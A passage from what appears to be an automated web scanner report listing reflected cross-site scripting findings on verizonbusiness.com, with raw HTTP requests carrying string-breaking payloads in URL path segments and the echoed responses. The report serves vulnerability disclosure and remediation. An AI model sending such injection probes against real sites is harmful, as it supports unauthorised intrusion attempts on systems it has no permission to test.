Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security31165";a248f0d3063/icsa-labs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.286. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/icsa-labs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 669d5'%3b88c3c18ede8 was submitted in the REST URL parameter 2. This input was echoed as 669d5';88c3c18ede8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security669d5'%3b88c3c18ede8/icsa-labs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/security669d5';88c3c18ede8/icsa-labs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.287. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/icsa-labs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 353f5"%3b19c93da1ee4 was submitted in the REST URL parameter 3. This input was echoed as 353f5";19c93da1ee4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/icsa-labs353f5"%3b19c93da1ee4/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43496
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/icsa-labs353f5";19c93da1ee4/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.288. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/icsa-labs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e9ff'%3b1c359516a8a was submitted in the REST URL parameter 3. This input was echoed as 5e9ff';1c359516a8a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/icsa-labs5e9ff'%3b1c359516a8a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43496
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/icsa-labs5e9ff';1c359516a8a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.289. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/identity/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcb32"%3b5c5cd0dd881 was submitted in the REST URL parameter 1. This input was echoed as bcb32";5c5cd0dd881 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsbcb32"%3b5c5cd0dd881/security/identity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsbcb32";5c5cd0dd881/security/identity/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEME
...[SNIP]...

1.290. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/identity/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7d41'%3bf1ee5719256 was submitted in the REST URL parameter 1. This input was echoed as a7d41';f1ee5719256 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsa7d41'%3bf1ee5719256/security/identity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:42 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Productsa7d41';f1ee5719256/security/identity/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.291. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/identity/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b80b1"%3b175efb16b16 was submitted in the REST URL parameter 2. This input was echoed as b80b1";175efb16b16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/securityb80b1"%3b175efb16b16/identity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:50 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42317
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/securityb80b1";175efb16b16/identity/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.292. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/identity/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc52b'%3bb33e431b249 was submitted in the REST URL parameter 2. This input was echoed as fc52b';b33e431b249 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/securityfc52b'%3bb33e431b249/identity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42317
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/securityfc52b';b33e431b249/identity/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.293. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/identity/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 190c3"%3bcc57f994bf7 was submitted in the REST URL parameter 3. This input was echoed as 190c3";cc57f994bf7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/identity190c3"%3bcc57f994bf7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43494
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/identity190c3";cc57f994bf7/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.294. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/identity/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31a83'%3b6e0d786270a was submitted in the REST URL parameter 3. This input was echoed as 31a83';6e0d786270a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/identity31a83'%3b6e0d786270a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43494
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/identity31a83';6e0d786270a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.295. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 574a7'%3bf972f6d2f26 was submitted in the REST URL parameter 1. This input was echoed as 574a7';f972f6d2f26 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products574a7'%3bf972f6d2f26/security/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40652
Date: Wed, 17 Nov 2010 00:40:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products574a7';f972f6d2f26/security/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.296. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c87f2"%3b61493363023 was submitted in the REST URL parameter 1. This input was echoed as c87f2";61493363023 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsc87f2"%3b61493363023/security/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:31 GMT
Content-Type: text/html
Content-Length: 40652
Date: Wed, 17 Nov 2010 00:40:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsc87f2";61493363023/security/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.297. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 870ae'%3b657e038b906 was submitted in the REST URL parameter 2. This input was echoed as 870ae';657e038b906 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security870ae'%3b657e038b906/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42315
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security870ae';657e038b906/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.298. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a5d"%3bdbcfc28ad79 was submitted in the REST URL parameter 2. This input was echoed as 18a5d";dbcfc28ad79 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security18a5d"%3bdbcfc28ad79/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
